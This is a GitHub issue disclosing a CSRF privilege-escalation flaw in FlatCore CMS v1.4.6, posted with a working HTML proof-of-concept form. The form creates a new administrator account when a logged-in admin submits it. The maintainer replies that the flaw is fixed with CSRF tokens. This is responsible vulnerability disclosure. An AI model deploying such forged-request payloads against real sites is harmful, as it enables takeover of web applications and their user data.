Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6 #27

Closed
shardulm94 opened this issue Apr 8, 2017 · 2 comments

Comments

Projects
None yet
2 participants
@shardulm94
Copy link

commented Apr 8, 2017

Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6
Date: 08-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of FlatCore, we can use CSRF to perform actions on the admin dashboard by targeting an administrator.

Exploit:
We assume that FlatCore is installed at http://localhost/. Our target is acp/acp.php?tn=user&sub=new&edituser= which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges.

<html>
<body>
    <form method="POST" action="http://localhost/acp/acp.php?tn=user&sub=new&edituser=">
        <input type="hidden" name="user_nick" value="testcsrf" />
        <input type="hidden" name="user_registerdate" value="" />
        <input type="hidden" name="user_verified" value="verified" />
        <input type="hidden" name="nbr_of_groups" value="0" />
        <input type="hidden" name="user_newsletter" value="none" />
        <input type="hidden" name="user_firstname" value="" />
        <input type="hidden" name="user_lastname" value="" />
        <input type="hidden" name="user_mail" value="csrf@csrf.com" />
        <input type="hidden" name="user_company" value="" />
        <input type="hidden" name="user_street" value="" />
        <input type="hidden" name="user_street_nbr" value="" />
        <input type="hidden" name="user_zipcode" value="" />
        <input type="hidden" name="user_city" value="" />
        <input type="hidden" name="user_psw_new" value="test" />
        <input type="hidden" name="user_psw_reconfirmation" value="test" />
        <input type="hidden" name="user_psw" value="" />
        <input type="hidden" name="drm_acp_class" value="administrator" />
        <input type="hidden" name="drm_acp_pages" value="drm_acp_pages" />
        <input type="hidden" name="drm_acp_editpages" value="drm_acp_editpages" />
        <input type="hidden" name="drm_acp_editownpages" value="drm_acp_editownpages" />
        <input type="hidden" name="drm_acp_files" value="drm_acp_files" />
        <input type="hidden" name="drm_acp_user" value="drm_acp_user" />
        <input type="hidden" name="drm_acp_system" value="drm_acp_system" />
        <input type="hidden" name="drm_moderator" value="drm_moderator" />
        <input type="hidden" name="drm_can_publish" value="drm_can_publish" />
        <input type="hidden" name="save_the_user" value="Save User" />
        <input type="submit" value="Submit!" />
    </form>
</body>
</html>

Before running the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created.

References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Screenshots:
Before the exploit
image

Exploit Page
image

After submitting the form
image

New user added
image
With admin access
image

Impact: Compromises the entire web application and user data
Mitigation: Use of CSRF tokens

Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the Global Headers (HTML) features can be misused to inject JS into the website.

@patkon

This comment has been minimized.

Copy link
Member

commented Apr 8, 2017

Woah. Thank you for the detailed description. I'll try to fix that as soon as possible.

@patkon

This comment has been minimized.

Copy link
Member

commented Apr 12, 2017

All forms in /acp/ now use CSRF token.
9a5e2c4

@shardulm94 shardulm94 closed this Jun 14, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.